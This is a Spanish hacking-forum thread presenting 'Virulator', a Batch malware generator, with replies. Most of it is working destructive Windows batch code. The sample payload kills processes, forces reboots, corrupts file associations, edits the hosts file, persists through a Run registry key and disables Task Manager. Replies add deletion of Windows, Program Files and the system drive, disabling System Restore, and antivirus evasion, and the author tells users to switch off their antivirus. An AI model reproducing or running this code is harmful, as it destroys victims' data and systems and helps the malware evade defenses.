VIRULATOR
(http://img99.imageshack.us/img99/8610/spiderbomb.png)
By Elektro H@cker
Virulator es un creador de "virus" para los amantes de Batch.
Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada).
Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)...
PD: No se pierdan la idea que se me ocurrió para "
Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino :).
- SCREENSHOTS:
(https://i.imgur.com/EGibn8A.png)
(https://i.imgur.com/Ry8zegm.png)
(https://i.imgur.com/LgnUG8d.png)
(https://i.imgur.com/9Y4NNVd.png)
(https://i.imgur.com/Qz8UOj0.png)
(https://i.imgur.com/7mYTmyK.png)
(https://i.imgur.com/LX2yMAT.png)
(https://i.imgur.com/XKFtzsR.png)
-
También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...(http://img205.imageshack.us/img205/5808/prtscrcapture6h.jpg)
- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator:
@Echo OFF
Title sdsdsd
:: Virus creado con [Virulator 1.0]
:: By Elektro H@cker
:: No me hago repsonsable del uso de este archivo.
If not exist "%TEMP%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^).Run """" ^& WScript.Arguments(0^) ^& """", 0, False>"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript "%TEMP%\invisible.vbs" %0) Else (Exit)
REM Matar proceso "explorer.exe"
Taskkill /F /IM "explorer.exe" >NUL 2>&1
REM Matar todos los procesos activos del sistema
For /F "Tokens=4 delims=<>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"') Do (Taskkill /F /T /IM "%%X" >NUL 2>&1)
REM Programar el apagado del PC en 60 segundos
Shutdown /R /T 60 /C "Soy Windows y me caes mal! No me vuelvas a encender, Noob..." /F >NUL
REM Da¤ar las extensiones de archivos de imagen
ASSOC .ani=regfile >NUL 2>&1
ASSOC .bmp=regfile >NUL 2>&1
ASSOC .cur=regfile >NUL 2>&1
ASSOC .gif=regfile >NUL 2>&1
ASSOC .ico=regfile >NUL 2>&1
ASSOC .img=regfile >NUL 2>&1
ASSOC .jpe=regfile >NUL 2>&1
ASSOC .jpg=regfile >NUL 2>&1
ASSOC .jpeg=regfile >NUL 2>&1
ASSOC .pcd=regfile >NUL 2>&1
ASSOC .png=regfile >NUL 2>&1
ASSOC .psd=regfile >NUL 2>&1
ASSOC .tga=regfile >NUL 2>&1
ASSOC .tif=regfile >NUL 2>&1
ASSOC .tiff=regfile >NUL 2>&1
REM Abrir multi instancia "notepad.exe"
Echo @echo off>>"%TEMP%\%~n0_720826398.bat"
Echo :Instance>>"%TEMP%\%~n0_720826398.bat"
Echo Start /B CMD /C "notepad.exe">>"%TEMP%\%~n0_720826398.bat"
Echo Goto :Instance>>"%TEMP%\%~n0_720826398.bat"
Start /B CMD /C "%TEMP%\%~n0_720826398.bat"
REM Mostrar mensaje "Te voy a joder el PC, Lammer!"
Echo X=msgbox("Te voy a joder el PC, Lammer!", 16,"Virus creado por Elektro H@cker")>"%TEMP%\virulator.vbs"
Start /B Wscript "%TEMP%\virulator.vbs"
REM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"
REM Bucle infinito
Echo @echo off>>"%TEMP%\%~n0_2514423018.bat"
Echo :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Echo Echo bucleeeeeeeee >>"%TEMP%\%~n0_2514423018.bat"
Echo Goto :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Start CMD /K "%TEMP%\%~n0_2514423018.bat"
REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess"
Copy /Y %0 "%WINDIR%\" >NUL 2>&1
Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D "%WINDIR%\%~n0.bat" /F >NUL 2>&1
REM Modificar fecha de Windows (Bucle infinito secuencial)
Echo :DateUP >"%TEMP%\DateUP.bat"
Echo For /L %%%%a in (2000,1,2099) Do ( >>"%TEMP%\DateUP.bat"
Echo For /L %%%%b in (1,1,12) Do ( >>"%TEMP%\DateUP.bat"
Echo For /L %%%%c in (1,1,31) Do ( >>"%TEMP%\DateUP.bat"
Echo Echo %%%%c/%%%%b/%%%%a ^| Date ^>NUL >>"%TEMP%\DateUP.bat"
Echo ping -n 1 localhost >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo Goto :DateUP >>"%TEMP%\DateUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat"
REM Modificar hora de Windows (Bucle infinito secuencial)
Echo :TimeUP >"%TEMP%\TimeUP.bat"
Echo For /L %%%%a in (0,1,23) Do ( >>"%TEMP%\TimeUP.bat"
Echo For /L %%%%b in (0,1,59) Do ( >>"%TEMP%\TimeUP.bat"
Echo Time %%%%a:%%%%b >>"%TEMP%\TimeUP.bat"
Echo ping -n 1 localhost >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo Goto :TimeUP >>"%TEMP%\TimeUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat"
REM Modificar el nombre del Boot de inicio "Disco C: Infectado"
label Disco C: Infectado>nul
REM Renombrar extension ".jpg" a ".txt"
FOR /R "%homedrive%\" %%X in (*.jpg) DO (Rename "%%X" "%%~nX.txt" >NUL 2>&1)
REM Hibernar el PC
RunDll32.exe powrprof.dll,SetSuspendState
REM Deshabilitar el administrador de tareas (TASKMGR.EXE)
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
REM Intercambiar los botones del mouse
Rundll32 User32.dll,SwapMouseButton
REM Fake-Virus 1 "Fake25917820"
(
echo @echo off
echo color 47
echo net stop themes 2^>nul
echo title INFECCION VIRAL PROFUNDA!
echo echo INFECCION VIRAL!!!
echo echo ERROR!!!
echo ECHO+
echo echo -
echo echo virus - TROJAN_DEMOLISHER code #45643676
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo FIREWALL - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo ANTI-VIRUS - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo DIRECCION IP - RECHAZADA
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo FIRMA VIRAL: ****-****-****-8894
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO AREAS INFECTADAS...
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo set /a num=0
echo :repeat1
echo set /a num=%%num%%+1
echo echo %%num%%
echo if %%num%%==100 goto end
echo goto repeat1
echo :end
echo PING -n 1 LOCALHOST ^>nul
echo cls
echo echo -
echo echo 86.5%%%% DE MEMORIA FISICA ESTA INFECTADA
echo echo -
echo echo INFECCION FATAL!
echo PING -n 3 LOCALHOST ^>nul
echo echo -
echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:]
echo echo -
echo echo PORFAVOR NO APAGUE EL SISTEMA
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing"
echo cls
echo echo -
echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO...
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo set /a num1=0
echo :repeat2
echo set /a num1=%%num1%% +1
echo echo %%num1%%
echo if %%num1%%==100 goto end1
echo goto repeat2
echo :end1
echo cls
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo 98.00%%%% DE MEMORIA FISICA HA SIDO DESINFECTADA
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo title FALLO EN EL SISTEMA
echo color 17
echo echo ERROR!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA VIRTUAL PERDIDA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA FISICA SOBRECALENTADA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo PROCESADOR SOBRECALENTANDOSE!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo ECHO LA RUPTURA TOTAL DEL SISTEMA ES INMINENTE!
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo -
echo echo -
echo echo -
echo echo -
echo ECHO RIESGO DE FUEGO ENCONTRADO!
echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS
echo echo -
echo echo -
echo echo -
echo echo -
echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F
echo PING -n 8 LOCALHOST ^>nul
echo Exit
)>%TEMP%\Fake25917820.bat
Start CMD /K %TEMP%\Fake25917820.bat
REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO)
(
echo @echo off
echo setlocal enabledelayedexpansion
echo Set File=0
echo For /F "Tokens=*" %%%%X in ('Dir /B /S /AD "%%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"'^) do (Call :COPY %%%%X^)
echo Exit
echo :Copy
echo Fsutil file createnew "%%*\%%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2^>^&1
echo Set /A File+=1
echo If !FILE! EQU 100 (Set /A File=0^& Goto :EOF^) ELSE (Call :COPY %%*^)
)>%TEMP%\basura.bat
Start /B %TEMP%\basura.bat
-
Y por último, Aquí tienen el script:Versión 1.0C
http://pastebin.com/raw.php?i=vqUN1g3p
(CASI)Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones).
Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir :laugh:.
PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor ;D.Gracias.
Espero que os guste aunque séa un poco y lo disfruteis!
Salu2.
Mola lo del reloj y la fecha y demás.Está bastante chulazo.Eres un crack , EleKtro H@cker. :-*
Una cosa en :
CitarREM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"
No deberia ser 127.0.0.1.¿eh?. :-*
Cita de: Jenag en 13 Junio 2012, 12:25 PM
Una cosa en :No deberia ser 127.0.0.1.¿eh?. :-*
Errata avistada! :rolleyes:, Aunque las páginas se bloquean igualmente, Así que lo dejo sin corregir hasta que tenga algo más para actualizar el script.
Cita de: Jenag en 13 Junio 2012, 12:22 PM
Mola lo del reloj y la fecha y demás.Está bastante chulazo
Gracias por comentar
besitos xD :)
un saludo
EDITO:
Versión 1.0c
Corregida la errata de la IP, Y Arreglado las opciones de propagación, que era lo único que me quedaba por testear a fondo (No funcionaban).
Tiene bastante buena pinta esto, yo soy bastante cabezota y por aprender me gusta programarme todo, por basico que sea, pero seguramente le eche un vistazo al codigo para ver como hacen las cosas los que saben de esto :D
Un saludo!
Cuando llegue a mi casa esta tarde, te hago de betatester en XP y si falla algo se cambia ;)
Cita de: -- KiLiaN -- en 13 Junio 2012, 14:00 PM
Cuando llegue a mi casa esta tarde, te hago de betatester en XP y si falla algo se cambia ;)
que bien, que bien! :)
saludos
hola y felisidades elecktro hacker boy a calarlo aver que tal en xp; seme ocurre algo que puedes añadir que los bichos que se crean; tengan la opcion de ser mutantes que cambien algunas lineas que estan abajo para arriba; que añadan codigo basura;que cambeen algunas partes de algunas lineas; que infecte accesos directos y que cambee el nombre en cada ejecucion.
Seme ocurre algo pero nose si se pueda en batch que el codigo este cifrado y al ejecutarlo se desencripte.
bueno saludos lo ultimo boy aber si sepuede
De momento he cambiado la opción de borrar carpetas y ficheros:
:KillFiles
Set "DIRFILE=%DIRFILE:^"=%" & Rem "
Echo+>>"%File%" & Echo REM Eliminar el archivo o ruta "%DIRFILE%">>"%File%"
Echo cacls "%DIRFILE%" /E /T /P "%username%":F^>nul 2^>^&1 >>"%FILE%"
Echo cacls "%DIRFILE%\*" /E /T /P "%username%":F ^>nul 2^>^&1 >>"%FILE%"
Echo Del /Q "%DIRFILE%" 2^>NUL
RD /Q /S "%DIRFILE%" ^>NUL 2^>^&1 >>"%FILE%"
call :continuar :KillFiles
Y en las preconfiguraciones:
:KillFiles_Preconfigurado_Windows
(
Echo+
Echo REM Eliminar todos los archivos de "Windows"
Echo cacls "%%WINDIR%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo RD /Q /S "%%WINDIR%%" ^>nul 2^>^&1
)>>"%FILE%"
set dirfile=
call :continuar :KillFiles
:KillFiles_Preconfigurado_programas
(
Echo+
Echo REM Eliminar todos los archivos de "Archivos de programa" x86-x64
Echo cacls "%%PROGRAMFILES%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo cacls "%%PROGRAMFILES(X86)%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo RD /Q /S "%%PROGRAMFILES%%" ^>nul 2^>^&1
Echo RD /Q /S "%%PROGRAMFILES(X86)%%" ^>nul 2^>^&1
)>>"%FILE%"
set dirfile=
call :continuar :KillFiles
:KillFiles_Preconfigurado_Disco
(
Echo+
Echo REM Eliminar todos los archivos del disco duro principal
Echo cacls "%%Systemdrive%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo For /D %%%%a in ^(%%SYSTEMDRIVE%%\*^) do ^(RD /Q /S "%%%%a" ^>nul 2^>^&1^)
)>>"%FILE%"
set dirfile=
call :continuar :KillFiles
También donde se cambia el archivo Host pero si sigo, voy a copiar aqui medio script..
Icalcs y takedown no existierón hasta el Vista..asique con eso rula.
Más adelante en las opciónes de cambiar la fecha y la hora haces referencía a un archivo llamado invisible.vbs que no se crea previamente (por lo tanto da error de que no existe).
En la opción de borrar carpetas y ficheros si metes la ruta con comillas se cierra.
Por lo demás me va de lujo, muy bueno y muy limpio el code se me ocurre que quizás se le pueda añadir opción a borrar alguna parte del historial eligiendo el número pero no he encontrado aún como meterle mano (como seleccionar una parte del archivo para borrarlo, poniendo etiquetas? nose), aún me quedan por tester la opciones de cambiar los botones del ratón y las que deshabilitan el apagado, el cambio de user, etc, que he mirado por lo alto y no tiene porque dar error..desde mi conocimiento limitado.
JO-DER
Vaya currada que nos has regalado ¡eh!
Oye... eso de crear un bucle que ¿función tiene?
Eso de bucle no es mas que para hacer que la computadora repita un comando o funcion u sin numero de veces para hacer que colapse, si se llena la ram, te tira un pantallazo azul, o si el procesador se pone lenta la pc, claro esta dependiendo de que tipo sea. Y no solo esas partes de la pc, se va mucho mas lejos.
Vale bien, gracias por responder :P
Lo he probado y está excelente compañero, bueno mejor dicho, está perfecto ;-)
Me gustaría que también estuviera echo en C, a ver si consigo destripar para adaptarlo a C. Excelente curro amigo ;D
Perfecto el trabajo. Un buen punto seria traducirlo a mas idiomas. El problema quiza este en caracteres raros como ß (Aleman) las vocales acentuadas y con dieresis etc
Cita de: Meine programmen en 17 Julio 2012, 16:05 PM
Perfecto el trabajo. Un buen punto seria traducirlo a mas idiomas. El problema quiza este en caracteres raros como ß (Aleman) las vocales acentuadas y con dieresis etc
Gracias, Pero, ¿Donde encuentro un voluntario que quiera traducir toda esa cantidad de texto al alemán? xD
Google no sería una opción, Es peligroso, Si te traduce mal una frase del script, pudes pensar que el script hará una cosa especifica cuando en realidad hace otra, Y termina en catástrofe internacional, No se si me hago entender...
Al inglés si que podría traducirlo, Pero siendo un script en Batch... No me apetece nada la verdad :xD, Dejémoslo así.
Un saludo!
Creo que nuestro amigo de arriba tiene ganas de traducir al alemán :xD si cuadra el se ofrece (no lo pongo en su boca, ¡eh! :laugh:)
EleKtro, está muy completo tu generador. No me suelen gustar este tipo de códigos, pero hay que reconocer que lo hiciste en profundidad, como suele ser con tus programas.
EDIT:
Ahora que me fijo, sería bueno establecer un orden en el que las funciones se escribirán al generar el script final. Digo, no tiene mucho sentido hibernar el PC y que el código aún no haya llegado a su fin.
Cita de: Binary_Death en 17 Julio 2012, 19:21 PM
sería bueno establecer un orden en el que las funciones se escribirán al generar el script final.
Pues tienes razón y es buena idea,
En el foro hice varios scripts que cumplen ese propósito para usuarios que pedian ayuda (cortar una parte de un txt, y colocarla en la linea X), Así que eso me ahorraría casi todo el trabajo.
Tomo nota para cuando saque una nueva versión.
un saludo!
wao men gran constructor xd ;-) ;-)
Bueno, le comente a Elektro hacker para hacer un ofuscador para la utilidad.
Para ello voy a iniciar un pequeño "log", de las detecciones de los antivirus y cambios que se realicen para evadirlos.
LINK:http://foro.elhacker.net/scripting/datos_analisis_av_continuado_virulator_rutinas_ofuscacion_nuevas-t367258.0.html (http://foro.elhacker.net/scripting/datos_analisis_av_continuado_virulator_rutinas_ofuscacion_nuevas-t367258.0.html)
Nos vemos por el foro.
Dios mio pedazo curro xD, pero en las imágenes las tildes no se te ven, eso lo has corregido? porque a mi me pasaba y aqui encontré como :D
http://foro.elhacker.net/scripting/caracteres_especiales_en_batch_espero_les_sirva-t270247.0.html
Y tengo unas dudas que me gustaría consultar contigo que se ve que sabes mucho, podríamos tratarlas por mensajes privados?
Gracias.
Cita de: Duning en 30 Julio 2012, 22:38 PMDios mio pedazo curro xD, pero en las imágenes las tildes no se te ven, eso lo has corregido? porque a mi me pasaba y aqui encontré como :D
http://foro.elhacker.net/scripting/caracteres_especiales_en_batch_espero_les_sirva-t270247.0.html
No te preocupes, Es algo que se me pasó (únicamente) al tomar las capturas. (No quise volverlas a hacer, Soy un vago xD).
Cita de: Duning en 30 Julio 2012, 22:38 PM
Y tengo unas dudas que me gustaría consultar contigo que se ve que sabes mucho, podríamos tratarlas por mensajes privados?
Si son dudas puntuales no hay problema, Si son dudas más profundizadas quizás te convendría crear un topic con todas tús preguntas para que te podamos ayudar entre todos, Y de paso les sirva al resto de usuarios.
Salu2.
Buenas!
Al intentar descargarme el script de la pagina me sale que hay un troyano y me bloquea la pagina... :huh: :huh: que puede ser?
Cita de: Danirs en 31 Julio 2012, 02:48 AMAl intentar descargarme el script de la pagina me sale que hay un troyano y me bloquea la pagina... :huh: :huh: que puede ser?
El script es detectado como virus por algunos AV's (Seguramente por los códigos VisualBasicScript que usa), Pero es un falso positivo, Virulator es una herramienta para crear "virus", Pero no es ninguna amenaza de infección de virus. Desactiva el AV que uses y déscarga el script si deseas.
Aquí tienes más info:
Cita de: m0rf en 18 Julio 2012, 22:06 PM
LINK:http://foro.elhacker.net/scripting/datos_analisis_av_continuado_virulator_rutinas_ofuscacion_nuevas-t367258.0.html (http://foro.elhacker.net/scripting/datos_analisis_av_continuado_virulator_rutinas_ofuscacion_nuevas-t367258.0.html)
Saludos.
Gracias efectivamente era eso que tu decias.
Desactivo y ya esta.
Viejo, esto en palabras de un n00b como yo, es MAGIA!!!!
gracias por ser tan genial sensei
(http://images3.wikia.nocookie.net/__cb20100617034455/sonic/images/archive/8/8e/20100711191854!Sonicartworkfromsonicadvance3.jpg)
Cita de: EleKtro H@cker en 31 Julio 2012, 03:14 AM
El script es detectado como virus por algunos AV's (Seguramente por los códigos VisualBasicScript que usa), Pero es un falso positivo, Virulator es una herramienta para crear "virus", Pero no es ninguna amenaza de infección de virus. Desactiva el AV que uses y déscarga el script si deseas.
Aquí tienes más info:
Saludos.
El proyecto no esta abandonado, espero sacar la primera versión antes de final de año.
La cosa es que me motivé mucho y empece a seleccionar más lenguajes de script para ofuscar xDD
Ya os contaré...
(http://s2.subirimagenes.com/privadas/previo/thump_1943547untitled.png)
:P
https://www.google.es/webhp?sourceid=chrome-instant&ie=UTF-8&ion=1#hl=es&safe=off&pwst=1&sa=X&ei=X45wUM_VBYGLhQeWmYGYCQ&spell=1&q=generator+virus+p43l0&ved=0CB4QvwUoAA&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&fp=f441e70d8610e415&biw=1680&bih=925&ion=1
El primer resultado igual te ayuda, en alguna cosa que le puede faltar a un virus generator.
Saludos
Yo tengo un problema cuando lo ejecuto me sale este mensaje No se encuentra el archivo de comandos c:\....invisible.vbs y en la consola aparece "El sistema no puede encontrar la ruta especificada
Alguna solucion ??
Quiero dar una idea, agregar la opción de des-habilitar restaurar sistema, la mayoría de los usuarios cuando entran en pánico por virus intentan usar esta herramienta, linda sorpresa les espera. :xD
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_SZ /d 1 /F
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_SZ /d 1 /F
Saludos.
Buf, cuantas cosas...
Virulator está un poco abandonado.
La imagen de "troyano bloqueado" es por algún código VBS que hay en el interior de virulator (No me he parado a mirar cual.)
@R4z3L.hax
REM Para ejecutar el bat en modo oculto:
REM Activar la siguiente linea manualmente...
REM Echo If not exist "%%TEMP%%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^^).Run """" ^^^& WScript.Arguments(0^^) ^^^& """", 0, False^>"%TEMP%\invisible.vbs" ^& wscript "%%TEMP%%\invisible.vbs" %%0) Else (Exit)>>"%FILE%"
algunas funciones necesitar que exista el archivo "invisible vbs", elimina las letras "REM" en la última linea.
@scalverth
Tienes razón, me apunto esa!
@тαптяαпсє
Gracias por la info
Un saludo
Gracias por todo este codigazo.
Tengo unas pocas preguntas ( ahora que me he animado por revisar un poco sobre esto :silbar: )
¿.bat es la extensión de los programas escritos en Batch?
¿Por qué no se considera a Batch como un lenguaje de programación?
Es decir, ¿por qué está en la zona Scripting?
¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad?
Gracias nuevamente . . .
Hola,
Gracias pero tus preguntas no son relacionadas con el aporte, debiste crear un nuevo tema...
Citar¿.bat es la extensión de los programas escritos en Batch?
Sí. También pueden ser ".cmd" (No hay diferencia).
Citar¿Por qué no se considera a Batch como un lenguaje de programación?
¿por qué está en la zona Scripting?
Porque es un lenguaje interpretado, como todos los de scripting... En cambio VB, C, Java, y todo el resto no necesitan un intérprete para su ejecución, ya que son compilados.
100% cierto es que Batch es un lenguaje de scripting, pero si lo diferencias con el resto de lenguajes de scripting puedes apreciar como haría falta añadir otro término a la lista solamente para apartar a Batch y dejarlo ahí, porque es el más limitado en todos los aspectos respecto a los otros...
Citar¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad?
Correcto.
Un saludo.
Porfavor no seguir haciendo preguntas que no tienen nada que ver con el post o lo acabaré cerrando.
muY Bueno!
gracias
Cita de: EleKtro H@cker en 13 Junio 2012, 12:04 PM
VIRULATOR
(http://img99.imageshack.us/img99/8610/spiderbomb.png)
By Elektro H@cker
Virulator es un creador de "virus" para los amantes de Batch.
Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada).
Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)...
PD: No se pierdan la idea que se me ocurrió para "Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino :).
- Estas son las opciones principales:
(http://img717.imageshack.us/img717/1640/prtscrcaptureac.jpg)
- Estas son las tareas disponibles por el momento:
(http://img339.imageshack.us/img339/6491/prtscrcapture2wc.jpg) (http://img825.imageshack.us/img825/5382/prtscrcapture3b.jpg)
(http://img23.imageshack.us/img23/6937/prtscrcapture4k.jpg) (http://img27.imageshack.us/img27/5663/prtscrcapture5i.jpg)
- También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...
(http://img205.imageshack.us/img205/5808/prtscrcapture6h.jpg)
- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator:
@Echo OFF
Title sdsdsd
:: Virus creado con [Virulator 1.0]
:: By Elektro H@cker
:: No me hago repsonsable del uso de este archivo.
If not exist "%TEMP%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^).Run """" ^& WScript.Arguments(0^) ^& """", 0, False>"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript "%TEMP%\invisible.vbs" %0) Else (Exit)
REM Matar proceso "explorer.exe"
Taskkill /F /IM "explorer.exe" >NUL 2>&1
REM Matar todos los procesos activos del sistema
For /F "Tokens=4 delims=<>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"') Do (Taskkill /F /T /IM "%%X" >NUL 2>&1)
REM Programar el apagado del PC en 60 segundos
Shutdown /R /T 60 /C "Soy Windows y me caes mal! No me vuelvas a encender, Noob..." /F >NUL
REM Da¤ar las extensiones de archivos de imagen
ASSOC .ani=regfile >NUL 2>&1
ASSOC .bmp=regfile >NUL 2>&1
ASSOC .cur=regfile >NUL 2>&1
ASSOC .gif=regfile >NUL 2>&1
ASSOC .ico=regfile >NUL 2>&1
ASSOC .img=regfile >NUL 2>&1
ASSOC .jpe=regfile >NUL 2>&1
ASSOC .jpg=regfile >NUL 2>&1
ASSOC .jpeg=regfile >NUL 2>&1
ASSOC .pcd=regfile >NUL 2>&1
ASSOC .png=regfile >NUL 2>&1
ASSOC .psd=regfile >NUL 2>&1
ASSOC .tga=regfile >NUL 2>&1
ASSOC .tif=regfile >NUL 2>&1
ASSOC .tiff=regfile >NUL 2>&1
REM Abrir multi instancia "notepad.exe"
Echo @echo off>>"%TEMP%\%~n0_720826398.bat"
Echo :Instance>>"%TEMP%\%~n0_720826398.bat"
Echo Start /B CMD /C "notepad.exe">>"%TEMP%\%~n0_720826398.bat"
Echo Goto :Instance>>"%TEMP%\%~n0_720826398.bat"
Start /B CMD /C "%TEMP%\%~n0_720826398.bat"
REM Mostrar mensaje "Te voy a joder el PC, Lammer!"
Echo X=msgbox("Te voy a joder el PC, Lammer!", 16,"Virus creado por Elektro H@cker")>"%TEMP%\virulator.vbs"
Start /B Wscript "%TEMP%\virulator.vbs"
REM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"
REM Bucle infinito
Echo @echo off>>"%TEMP%\%~n0_2514423018.bat"
Echo :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Echo Echo bucleeeeeeeee >>"%TEMP%\%~n0_2514423018.bat"
Echo Goto :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Start CMD /K "%TEMP%\%~n0_2514423018.bat"
REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess"
Copy /Y %0 "%WINDIR%\" >NUL 2>&1
Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D "%WINDIR%\%~n0.bat" /F >NUL 2>&1
REM Modificar fecha de Windows (Bucle infinito secuencial)
Echo :DateUP >"%TEMP%\DateUP.bat"
Echo For /L %%%%a in (2000,1,2099) Do ( >>"%TEMP%\DateUP.bat"
Echo For /L %%%%b in (1,1,12) Do ( >>"%TEMP%\DateUP.bat"
Echo For /L %%%%c in (1,1,31) Do ( >>"%TEMP%\DateUP.bat"
Echo Echo %%%%c/%%%%b/%%%%a ^| Date ^>NUL >>"%TEMP%\DateUP.bat"
Echo ping -n 1 localhost >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo Goto :DateUP >>"%TEMP%\DateUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat"
REM Modificar hora de Windows (Bucle infinito secuencial)
Echo :TimeUP >"%TEMP%\TimeUP.bat"
